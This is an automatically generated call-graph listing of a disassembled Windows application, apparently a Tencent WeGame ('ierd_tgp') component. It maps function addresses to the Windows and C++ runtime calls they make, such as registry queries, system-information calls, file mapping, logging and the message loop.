?get_log_instance@base@@YAPAVILogger@1 70828->70830 70831 45e801 70829->70831 70830->70831 70831->70826 70832 45e844 GetLastError 70831->70832 70835 43f4bb 21 API calls 70831->70835 70836 420c80 _invalid_parameter_noinfo_noreturn ~refcount_ptr 70831->70836 70837 43e231 _invalid_parameter_noinfo_noreturn 70831->70837 70898 46bf87 19 API calls 2 library calls 70831->70898 70897 46bf87 19 API calls 2 library calls 70832->70897 70835->70831 70836->70831 70837->70831 70839 4599ed __EH_prolog3 70838->70839 70902 450aad 70839->70902 70841 4599fa 70906 4540ff 70841->70906 70843 459a13 ~refcount_ptr 70843->70801 70845 46e3bc std::_Facet_Register 4 API calls 70844->70845 70846 458a83 70845->70846 70925 45290b 70846->70925 70848 458aa3 70848->70803 70850 450f3e __EH_prolog3_GS 70849->70850 70929 452c1a 70850->70929 70855 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70856 450f9b 70855->70856 70857 46e420 5 API calls 70856->70857 70858 450fa6 70857->70858 70859 458990 70858->70859 70860 45899f __EH_prolog3_GS 70859->70860 70861 46e3bc std::_Facet_Register 4 API calls 70860->70861 70862 4589b7 70861->70862 70863 45290b 4 API calls 70862->70863 70864 4589d6 70863->70864 70865 43df6d 6 API calls 70864->70865 70867 4589e2 70865->70867 70866 458a00 _Open_dir 70868 458a44 70866->70868 70869 458a2a 70866->70869 70867->70866 70870 46e420 5 API calls 70868->70870 70972 46737a 39 API calls 2 library calls 70869->70972 70872 458a4f 70870->70872 70872->70808 70874 4694fa __EH_prolog3_GS 70873->70874 70885 46950a 70874->70885 70973 4691fe 37 API calls 2 library calls 70874->70973 70876 469538 70974 45cbbc 70876->70974 70879 4695a6 70881 4695c7 70879->70881 70883 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70879->70883 70880 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70880->70879 70884 4695e2 70881->70884 70886 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70881->70886 70882 40d190 6 API calls 70882->70885 70883->70881 70887 46e420 5 API calls 70884->70887 70885->70879 70885->70880 70886->70884 70888 4695e9 70887->70888 70888->70826 70890 46741d _Read_dir 70889->70890 70891 467467 70889->70891 70892 46744d 70890->70892 70893 46743d _Close_dir 70890->70893 70894 46e3fa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 70891->70894 71009 46737a 39 API calls 2 library calls 70892->71009 70893->70891 70896 467473 70894->70896 70896->70826 70897->70831 70898->70831 70899->70812 70900->70815 70901->70818 70903 450ab9 __EH_prolog3 70902->70903 70912 46602a 70903->70912 70905 450acc ~refcount_ptr 70905->70841 70907 454123 70906->70907 70908 45410e 70906->70908 70924 451fc5 8 API calls 2 library calls 70907->70924 70923 451fc5 8 API calls 2 library calls 70908->70923 70911 45411d 70911->70843 70913 466036 __EH_prolog3_catch 70912->70913 70916 40cbd0 70913->70916 70915 466040 ~refcount_ptr 70915->70905 70917 40cc09 70916->70917 70918 40cbde 70916->70918 70917->70915 70919 46e3bc std::_Facet_Register 4 API calls 70918->70919 70920 40cbef 70919->70920 70921 40cc03 _invalid_parameter_noinfo_noreturn 70920->70921 70922 40cbf8 70920->70922 70921->70917 70922->70915 70923->70911 70924->70911 70926 452917 __EH_prolog3_catch 70925->70926 70927 46e3bc std::_Facet_Register 4 API calls 70926->70927 70928 452924 ~refcount_ptr 70927->70928 70928->70848 70930 452c27 70929->70930 70945 4525c7 70930->70945 70933 452c55 70934 452c61 __EH_prolog3_GS 70933->70934 70967 450bce 70934->70967 70937 40c300 SimpleUString::operator= 11 API calls 70938 452d60 70937->70938 70939 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70938->70939 70940 452d6c 70939->70940 70941 46e420 5 API calls 70940->70941 70942 450f90 70941->70942 70942->70855 70944 452d45 70944->70937 70946 4525dd 70945->70946 70949 40eff0 70946->70949 70948 450f88 70948->70933 70950 40f177 70949->70950 70951 40f009 70949->70951 70966 40c810 ?_Xout_of_range@std@@YAXPBD 70950->70966 70953 40f047 70951->70953 70954 40f01f memmove 70951->70954 70957 40f09c 70953->70957 70959 40f050 memmove memmove 70953->70959 70954->70948 70960 40f157 70957->70960 70963 40f0b1 memmove memmove memmove 70957->70963 70959->70948 70965 40f430 12 API calls 3 library calls 70960->70965 70962 40f16e 70962->70948 70963->70948 70965->70962 70968 450bec 70967->70968 70969 450bfa 70967->70969 70970 40bf70 SimpleUString::operator= 8 API calls 70968->70970 70969->70944 70971 46b2d1 8 API calls 70969->70971 70970->70969 70971->70944 70972->70868 70973->70876 70976 45cbc9 70974->70976 70977 45cbd9 70976->70977 70980 45ca94 70976->70980 70984 467560 70977->70984 70983 45caa8 70980->70983 70981 467560 37 API calls 70982 45cb85 70981->70982 70982->70976 70983->70981 70985 46756c __EH_prolog3_GS 70984->70985 70987 4675ad 70985->70987 70993 467601 70985->70993 70996 4675cf 70985->70996 71007 40bae0 9 API calls SimpleUString::operator= 70987->71007 70990 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70991 4676fa 70990->70991 70992 46e420 5 API calls 70991->70992 70994 45cbe3 70992->70994 70999 450fa9 70993->70999 70994->70882 70995 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70995->70993 70996->70993 71008 40bae0 9 API calls SimpleUString::operator= 70996->71008 70998 4675ba 70998->70995 71000 450fb5 __EH_prolog3_GS 70999->71000 71001 450f32 37 API calls 71000->71001 71002 450fc3 71001->71002 71003 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 71002->71003 71004 450fdb 71003->71004 71005 46e420 5 API calls 71004->71005 71006 450fe2 71005->71006 71006->70990 71007->70998 71008->70998 71009->70891 71010 4626e7 71036 46e476 71010->71036 71012 4626f3 ?get_log_instance@base@@YAPAVILogger@1 71013 462756 71012->71013 71014 462709 71012->71014 71015 462869 DefWindowProcA 71013->71015 71016 4627ec 71013->71016 71017 46276c 71013->71017 71014->71013 71024 43f4bb 21 API calls 71014->71024 71025 4627e4 71015->71025 71016->71015 71019 4627f1 ?get_log_instance@base@@YAPAVILogger@1 71016->71019 71017->71015 71020 462776 ?get_log_instance@base@@YAPAVILogger@1 71017->71020 71018 46e420 5 API calls 71022 46287e 71018->71022 71023 462848 ?enable_app_session_end@common@ierd_tgp@@YAX_N ?exit_app@Application@common@ierd_tgp@@QAEXH 71019->71023 71027 4627fc 71019->71027 71021 4627d4 ?enable_app_session_end@common@ierd_tgp@@YAX_N 71020->71021 71028 462788 71020->71028 71021->71025 71023->71025 71026 462747 71024->71026 71025->71018 71037 43e231 _invalid_parameter_noinfo_noreturn 71026->71037 71027->71023 71030 43f4bb 21 API calls 71027->71030 71028->71021 71031 43f4bb 21 API calls 71028->71031 71032 462839 71030->71032 71033 4627c5 71031->71033 71039 43e231 _invalid_parameter_noinfo_noreturn 71032->71039 71038 43e231 _invalid_parameter_noinfo_noreturn 71033->71038 71036->71012 71037->71013 71038->71021 71039->71023 71040 6bdbd879 __EH_prolog3_GS 71041 6bd0a8f0 71040->71041 71042 6bdbd8b5 GetModuleHandleA GetProcAddress 71041->71042 71043 6bdbd942 RegOpenKeyExA 71042->71043 71044 6bdbd8f1 memset GlobalMemoryStatusEx 71042->71044 71045 6bdbd9b7 71043->71045 71046 6bdbd966 RegQueryValueExA 71043->71046 71044->71043 71048 6bdbd9cc GetModuleHandleA GetProcAddress 71045->71048 71049 6bdbd9c0 RegCloseKey 71045->71049 71046->71045 71047 6bdbd991 71046->71047 71047->71045 71050 6bdbd99a RegQueryValueExA 71047->71050 71051 6bdbd9f4 GetNativeSystemInfo 71048->71051 71052 6bdbda03 71048->71052 71049->71048 71050->71045 71051->71052 71053 6be388c0 71055 6be388ce 71053->71055 71054 6be388d7 71055->71054 71056 6be38945 __acrt_iob_func __acrt_iob_func __acrt_iob_func 71055->71056 71057 6be38a80 71056->71057 71058 6bdaf17f __EH_prolog3_GS GetSystemTimes 71059 6bdaf1ea 71058->71059 71060 6bdaf1a5 ?get_log_instance@base@@YAPAVILogger@1 71058->71060 71060->71059 71061 6bdaf1b0 71060->71061 71061->71059 71062 6bd1e945 17 API calls 71061->71062 71062->71059 71063 6bf6fd50 71064 6bf6fd6e 71063->71064 71065 6bf6fd5d 71063->71065 71065->71064 71066 6bf6fd64 socket 71065->71066 71067 6bf6fd69 socket 71065->71067 71070 6bdbb3f3 __EH_prolog3_GS 71071 6bd0a8f0 71070->71071 71072 6bdbb413 RegOpenKeyExW 71071->71072 71073 6bdbb43a memset RegQueryValueExW 71072->71073 71074 6bdbb54c ?get_log_instance@base@@YAPAVILogger@1 71072->71074 71076 6bdbb4eb ?get_log_instance@base@@YAPAVILogger@1 71073->71076 71077 6bdbb490 71073->71077 71075 6bdbb5b1 RegCloseKey 71074->71075 71080 6bdbb557 71074->71080 71078 6bdbb5c2 71075->71078 71076->71075 71082 6bdbb4fa 71076->71082 71079 6bdbb4c5 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71077->71079 71085 6bdbb4e6 71079->71085 71080->71075 71081 6bdbb583 GetLastError 71080->71081 71083 6bd1e945 17 API calls 71081->71083 71082->71075 71084 6bdbb52a GetLastError 71082->71084 71083->71085 71086 6bd1e945 17 API calls 71084->71086 71085->71075 71086->71085 71087 6bdd1ff6 71088 6be24070 71087->71088 71089 6bdd2012 ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@ 71088->71089 71094 6bd447cc __EH_prolog3 71089->71094 71091 6bdd2072 71098 6bdcf356 __EH_prolog3 ?unsetf@ios_base@std@@QAEXH 71091->71098 71093 6bdd2088 71095 6bd447e6 71094->71095 71105 6bd448c4 __EH_prolog3 71095->71105 71097 6bd447f7 71097->71091 71099 6bdce574 71098->71099 71100 6bdcf3af ?fail@ios_base@std@ 71099->71100 71101 6bdcf3ed 71100->71101 71102 6bdcf3c0 ?bad@ios_base@std@ 71100->71102 71103 6bdcf3fa _CxxThrowException 71101->71103 71102->71101 71104 6bdcf3d1 71102->71104 71104->71093 71106 6bd448df ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 71105->71106 71107 6bd448f8 ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 71105->71107 71106->71107 71108 6bd4492d 71107->71108 71113 6bd3a5bc __EH_prolog3 71108->71113 71110 6bd44945 71111 6bd44949 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 71110->71111 71112 6bd44959 71110->71112 71111->71112 71112->71097 71114 6bd3a5d0 ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH 71113->71114 71115 6bd3a605 71113->71115 71114->71115 71116 6bd3a5e5 71114->71116 71115->71110 71117 6bd3a5ef ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 71116->71117 71117->71115 71118 6bdb5af0 __EH_prolog3_GS 71119 6bd0a8f0 71118->71119 71120 6bdb5b42 ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1 71119->71120 71121 6bdb5b64 71120->71121 71122 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71121->71122 71123 6bdb5b8e 71122->71123 71124 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71123->71124 71125 6bdb5bb3 71124->71125 71126 6bd275ff __EH_prolog3_GS 71127 6bd2761b 71126->71127 71137 6bd27859 71126->71137 71128 6bd27638 _Copy_construct_from ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@ 71127->71128 71129 6bd277e6 GetTickCount 71128->71129 71130 6bd27669 71129->71130 71134 6bd2780a 71130->71134 71141 6bd276ff ?get_log_instance@base@@YAPAVILogger@1 71130->71141 71142 6bd276ec ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12 71130->71142 71143 6bd277f3 Sleep 71130->71143 71144 6bd27799 GetTickCount 71130->71144 71149 6bd27733 ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12 71130->71149 71150 6bd1e945 17 API calls 71130->71150 71151 6bd2788d ?stamp_point@@YAXPBD 71130->71151 71132 6bd27670 GetTickCount 71135 6bd27683 GetTickCount 71132->71135 71136 6bd2768a GetTickCount 71132->71136 71133 6bd27826 _Copy_construct_from ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@ 71133->71137 71134->71133 71138 6bd27693 GetTickCount 71135->71138 71136->71138 71139 6bd276c2 GetTickCount 71138->71139 71140 6bd276b2 GetTickCount 71138->71140 71139->71130 71140->71139 71141->71130 71142->71130 71143->71130 71146 6bd277d4 GetTickCount 71144->71146 71147 6bd277cd GetTickCount 71144->71147 71148 6bd277dd 71146->71148 71147->71148 71148->71129 71149->71130 71150->71130 71152 6bd278b9 QueryPerformanceCounter 71151->71152 71153 6bd278ae QueryPerformanceFrequency 71151->71153 71154 6bd27a11 PeekMessageW 71152->71154 71153->71152 71155 6bd27a23 ?stamp_point@@YAXPBD 71154->71155 71164 6bd278cf 71154->71164 71155->71132 71156 6bd278d5 TranslateMessage 71157 6bd278fa GetTickCount 71156->71157 71156->71164 71160 6bd278f1 71157->71160 71161 6bd2791a DispatchMessageW GetTickCount 71157->71161 71158 6bd27947 QueryPerformanceCounter 71158->71164 71159 6bd2793d ?exit_app@Application@common@ierd_tgp@@QAEXH 71159->71158 71160->71157 71160->71161 71162 6bd2790f SetEvent 71160->71162 71161->71158 71162->71161 71163 6bd2799f __aulldiv 71163->71164 71165 6bd279e7 PeekMessageA 71163->71165 71164->71154 71164->71155 71164->71156 71164->71158 71164->71159 71164->71160 71164->71161 71164->71163 71164->71165 71165->71164 71166 6bd2737c __EH_prolog3 ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 71167 6bd273a8 71166->71167 71168 6be161d0 71169 6be161d9 71168->71169 71173 6be1621c 71168->71173 71178 6be14e80 71169->71178 71171 6be161e4 71172 6be1623f _invalid_parameter_noinfo_noreturn 71171->71172 71171->71173 71174 6be16259 71172->71174 71175 6be1629c 71172->71175 71174->71175 71176 6be162bf _invalid_parameter_noinfo_noreturn 71174->71176 71177 6be162dc 71176->71177 71179 6be14edd 71178->71179 71180 6be14e8f 71178->71180 71179->71171 71180->71179 71181 6be14ee1 _invalid_parameter_noinfo_noreturn 71180->71181 71182 6be14ef0 71181->71182 71182->71171 71183 6bd96868 71184 6bd96690 28 API calls 71183->71184 71185 6bd9687b 71184->71185 71186 6bd46fe3 __EH_prolog3 71187 6bd47010 71186->71187 71190 6bd4a3e3 __EH_prolog3_catch_GS 71187->71190 71189 6bd47025 71191 6bd4a40e 71190->71191 71192 6bd4a4dd 71191->71192 71195 6bd4a42a 71191->71195 71206 6bd4a5b5 __EH_prolog3_GS 71192->71206 71194 6bd4a453 71196 6bd4a460 71194->71196 71199 6bd4a457 71194->71199 71195->71196 71197 6bd4a5b5 49 API calls 71195->71197 71198 6bd4a549 71196->71198 71201 6bd474ad 5 API calls 71196->71201 71197->71194 71203 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71198->71203 71200 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71199->71200 71204 6bd4a57a 71200->71204 71202 6bd4a531 71201->71202 71205 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71202->71205 71203->71204 71204->71189 71205->71198 71207 6bd4a610 71206->71207 71208 6bd4a626 71207->71208 71209 6bd4a831 71207->71209 71210 6bd4a653 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71208->71210 71211 6bd4a85b ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71209->71211 71212 6bd4a672 71210->71212 71213 6bd1d276 71211->71213 71239 6bd49def __EH_prolog3_catch_GS 71212->71239 71214 6bd4a87a ?get_log_instance@base@@YAPAVILogger@1 71213->71214 71222 6bd4a885 71214->71222 71228 6bd4a825 71214->71228 71216 6bd4a681 71217 6bd4a689 71216->71217 71218 6bd4a7ca ?get_log_instance@base@@YAPAVILogger@1 71216->71218 71220 6bd447cc 8 API calls 71217->71220 71225 6bd4a7d9 71218->71225 71218->71228 71219 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71224 6bd4a8eb 71219->71224 71221 6bd4a69e 71220->71221 71223 6bd4a6a7 71221->71223 71230 6bd4a795 71221->71230 71226 6bd1e945 17 API calls 71222->71226 71222->71228 71227 6bd4a6ba ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71223->71227 71224->71194 71225->71228 71231 6bd1e945 17 API calls 71225->71231 71226->71228 71229 6bd4a6e2 ?get_log_instance@base@@YAPAVILogger@1 71227->71229 71238 6bd4a735 71227->71238 71228->71219 71236 6bd4a6ed 71229->71236 71229->71238 71232 6bd4a7b7 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71230->71232 71231->71228 71232->71228 71233 6bd4a769 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71234 6bd454a5 71233->71234 71235 6bd4a784 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71234->71235 71235->71228 71237 6bd1e945 17 API calls 71236->71237 71236->71238 71237->71238 71238->71233 71240 6bd49e25 71239->71240 71241 6bd49e30 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71240->71241 71242 6bd1d276 71241->71242 71243 6bd49e4f ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@ 71242->71243 71244 6bd49e6c ?get_log_instance@base@@YAPAVILogger@1 71243->71244 71245 6bd49e5a 71243->71245 71250 6bd49e73 71244->71250 71246 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71245->71246 71251 6bd49e65 71246->71251 71247 6bd49ed5 ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@ 71248 6bd49ef2 ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@ 71247->71248 71249 6bd49efc ?filename@path@filesystem@ierd_tgp@@QBE?AV123 ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ ?backup_cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 71247->71249 71248->71249 71253 6bd49f39 71249->71253 71250->71247 71252 6bd1e945 17 API calls 71250->71252 71251->71216 71252->71250 71254 6bd49f72 ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0 ?get_log_instance@base@@YAPAVILogger@1 71253->71254 71257 6bd49f85 71254->71257 71255 6bd49fe7 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@ 71256 6bd4a017 ?get_log_instance@base@@YAPAVILogger@1 71255->71256 71258 6bd49ff2 71255->71258 71260 6bd4a01e 71256->71260 71257->71255 71261 6bd1e945 17 API calls 71257->71261 71258->71256 71259 6bd4a080 71262 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71259->71262 71260->71259 71263 6bd1e945 17 API calls 71260->71263 71261->71257 71262->71251 71263->71260 71264 6bd45f63 __EH_prolog3_catch_GS 71265 6bd19a8e 71264->71265 71266 6bd45fb6 ?GetWeGameAppDataPathW@Sys_wrapper@common@ierd_tgp@@SA_NAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 71265->71266 71267 6bd45fe7 ?get_log_instance@base@@YAPAVILogger@1 71266->71267 71268 6bd45fc8 71266->71268 71267->71268 71269 401d78 71274 4586d5 71269->71274 71271 401d82 71288 46e7bc _crt_atexit _register_onexit_function __onexit 71271->71288 71273 401d8c 71275 4586e1 __EH_prolog3 71274->71275 71289 46172d GetCurrentProcessId memset 71275->71289 71277 4586e8 CreateFileMappingW 71278 458700 GetLastError 71277->71278 71279 45871a MapViewOfFile 71277->71279 71292 46dcac __stdio_common_vfprintf __acrt_iob_func __vfprintf_l 71278->71292 71281 458731 GetLastError 71279->71281 71282 458748 71279->71282 71293 46dcac __stdio_common_vfprintf __acrt_iob_func __vfprintf_l 71281->71293 71284 46e3bc std::_Facet_Register 4 API calls 71282->71284 71285 45874f memmove 71284->71285 71286 458711 ~refcount_ptr 71285->71286 71286->71271 71288->71273 71294 401e60 71289->71294 71292->71286 71293->71286 71297 401e20 71294->71297 71296 401e78 wcscat_s 71296->71277 71300 401e10 71297->71300 71299 401e3a __stdio_common_vswprintf_s 71299->71296 71300->71299 71301 6bd2e4eb 71302 6bd2e4f5 71301->71302 71303 6bd2e519 71301->71303 71302->71303 71304 6bd2e50e FindCloseChangeNotification 71302->71304 71305 6be2425d 71306 6be24269 71305->71306 71307 6be2429a 71306->71307 71308 6be2435f ___scrt_fastfail 71306->71308 71315 6be24275 71306->71315 71309 6be242ad __RTC_Initialize 71307->71309 71313 6be242fa 71307->71313 71310 6be2334f 71309->71310 71311 6be242b7 ___scrt_initialize_default_local_stdio_options _initterm_e 71310->71311 71312 6be242d1 71311->71312 71311->71313 71312->71313 71316 6be242da _initterm 71312->71316 71314 6be2431a ___scrt_is_nonwritable_in_current_image 71313->71314 71313->71315 71314->71315 71317 6be24325 ?shutdown@Application@common@ierd_tgp@ 71314->71317 71316->71313 71317->71315 71318 6bd95ce6 __EH_prolog3_GS 71319 6bd95d5d ?get_log_instance@base@@YAPAVILogger@1 71318->71319 71320 6bd95cff ?get_log_instance@base@@YAPAVILogger@1 71318->71320 71321 6bd95dac 71319->71321 71326 6bd95d6b 71319->71326 71324 6bd95d0a 71320->71324 71334 6bd95d47 71320->71334 71322 6bd95deb GetCurrentThreadId 71321->71322 71323 6bd95f3d ?real_report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@ 71321->71323 71321->71334 71322->71323 71325 6bd95e00 71322->71325 71323->71334 71328 6bd1e945 17 API calls 71324->71328 71324->71334 71329 6bd95e20 std::_Cnd_initX 71325->71329 71330 6bd95eba 71325->71330 71326->71321 71327 6bd1e945 17 API calls 71326->71327 71327->71321 71328->71334 71331 6bd95e64 71329->71331 71333 6bd95f17 ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK 71330->71333 71332 6bd95e99 ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK std::_Cnd_initX 71331->71332 71332->71334 71333->71334 71335 6bd39c91 __EH_prolog3_GS 71337 6bd39cba 71335->71337 71336 6bd39cbf 71337->71336 71338 6bd3a03c SHCreateDirectoryExW 71337->71338 71339 6bd39d84 71337->71339 71348 6bd39ebc 71338->71348 71340 6bd39ded SHCreateDirectoryExW 71339->71340 71341 6bd39dfc 71340->71341 71341->71336 71349 6bd38e87 __EH_prolog3_catch_GS 71341->71349 71342 6bd39f64 _beginthreadex 71344 6bd39f81 71342->71344 71345 6bd39ffc ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K 71344->71345 71345->71336 71346 6bd39e3d 71355 6bd3841c __EH_prolog3_GS 71346->71355 71348->71336 71348->71342 71348->71344 71350 6bd38ebd 71349->71350 71352 6bd38f31 71350->71352 71369 6bd336e7 __EH_prolog3 71350->71369 71353 6bd38f99 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71352->71353 71354 6bd38fac 71353->71354 71354->71346 71356 6bd38432 71355->71356 71357 6bd3845b 71356->71357 71358 6bd38438 CreateFileW 71356->71358 71371 6bd3444f __EH_prolog3 71357->71371 71358->71357 71359 6bd38544 71358->71359 71359->71348 71361 6bd38476 71362 6bd38497 CreateFileMappingW MapViewOfFile 71361->71362 71362->71359 71364 6bd384c5 71362->71364 71363 6bd384ef _memcpy_s 71365 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71363->71365 71364->71363 71366 6bd3850e 71365->71366 71367 6bd38528 _memcpy_s 71366->71367 71368 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71367->71368 71368->71359 71370 6bd3372c 71369->71370 71370->71352 71372 6be22dcc std::_Facet_Register 4 API calls 71371->71372 71373 6bd3446d 71372->71373 71375 6bd3448b 71373->71375 71376 6bd3241a 71373->71376 71375->71361 71379 6bd367c2 __EH_prolog3 71376->71379 71378 6bd3244a 71378->71375 71380 6bd367fd 71379->71380 71383 6bd3a075 __EH_prolog3_GS _time64 71380->71383 71382 6bd36841 71382->71378 71384 6bd3a0ab 71383->71384 71385 6bd3a10f 71383->71385 71394 6bd38127 __EH_prolog3_GS 71384->71394 71404 6bd37c3d 71385->71404 71388 6bd3a0d1 71389 6bd3a0e6 _memcpy_s 71388->71389 71390 6bd3a0d8 71388->71390 71391 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71389->71391 71392 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71390->71392 71391->71385 71393 6bd3a0e4 71392->71393 71393->71382 71395 6bd3814d 71394->71395 71396 6bd3821f 71394->71396 71395->71396 71397 6bd3817e memset 71395->71397 71403 6bd381e6 71395->71403 71396->71388 71399 6bd3819c 71397->71399 71398 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71398->71396 71408 6bf73080 71399->71408 71401 6bd381ad 71401->71403 71412 6bf72f50 71401->71412 71403->71398 71405 6bd37c43 71404->71405 71406 6bd37c6c 71404->71406 71423 6bd04df0 71405->71423 71406->71393 71410 6bf730a4 71408->71410 71411 6bf730e0 71410->71411 71416 6bf73150 71410->71416 71411->71401 71413 6bf72fab 71412->71413 71414 6bf73150 3 API calls 71413->71414 71415 6bf73006 71414->71415 71415->71403 71418 6bf7316c 71416->71418 71419 6bf731c8 71418->71419 71420 6bf75150 CryptAcquireContextA 71418->71420 71419->71410 71421 6bf75171 CryptGenRandom CryptReleaseContext 71420->71421 71422 6bf7516d 71420->71422 71421->71418 71422->71418 71426 6bd04e10 71423->71426 71425 6bd04e07 71425->71406 71427 6bd04e21 71426->71427 71428 6bd05118 71426->71428 71427->71428 71432 6bd08980 malloc 71427->71432 71428->71425 71429 6bd04ee8 71429->71428 71430 6bd05076 memset 71429->71430 71430->71425 71432->71429 71433 6bd36a14 71434 6bd3444f 17 API calls 71433->71434 71437 6bd36a31 71434->71437 71435 6bd36b08 71436 6bd38e87 3 API calls 71435->71436 71441 6bd36b1d 71436->71441 71437->71435 71438 6bd36ae1 ?c_str@path@filesystem@ierd_tgp@ 71437->71438 71439 6bd329ad 71438->71439 71440 6bd36af5 ~refcount_ptr abort 71439->71440 71440->71435 71452 6bd38e45 __EH_prolog3 71441->71452 71443 6bd36c86 71456 6bd38b59 __EH_prolog3_catch_GS 71443->71456 71444 6bd36b89 71444->71443 71446 6bd36bdb OutputDebugStringW 71444->71446 71448 6bd36bee 71446->71448 71447 6bd36c98 71449 6bd38e45 9 API calls 71448->71449 71450 6bd36c25 71449->71450 71450->71443 71451 6bd36c73 OutputDebugStringW 71450->71451 71451->71443 71453 6bd38e62 71452->71453 71471 6bd3a667 __EH_prolog3_GS 71453->71471 71455 6bd38e76 71455->71444 71457 6bd38c87 71456->71457 71458 6bd38b79 71456->71458 71457->71447 71459 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71458->71459 71460 6bd38c07 71459->71460 71461 6bd38c75 71460->71461 71463 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71460->71463 71462 6bd38c7b 71461->71462 71465 6bd38c9b 71461->71465 71464 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71462->71464 71463->71461 71464->71457 71466 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71465->71466 71467 6bd38cd5 71466->71467 71468 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71467->71468 71469 6bd38ce1 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 71468->71469 71470 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71469->71470 71470->71457 71472 6bd3a681 71471->71472 71479 6bd3a628 71472->71479 71475 6bd3a695 ?rdstate@ios_base@std@ 71476 6bd3a6bc 71475->71476 71477 6bd3a6cb OutputDebugStringW 71476->71477 71478 6bd3a6de 71477->71478 71478->71455 71480 6bd3a5bc 3 API calls 71479->71480 71481 6bd3a643 71480->71481 71482 6bd3a651 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 71481->71482 71483 6bd3a65b ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 71481->71483 71484 6bd3a663 71482->71484 71483->71484 71484->71475 71484->71478 71485 6bd25515 __EH_prolog3_GS 71486 6bd2553c ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 71485->71486 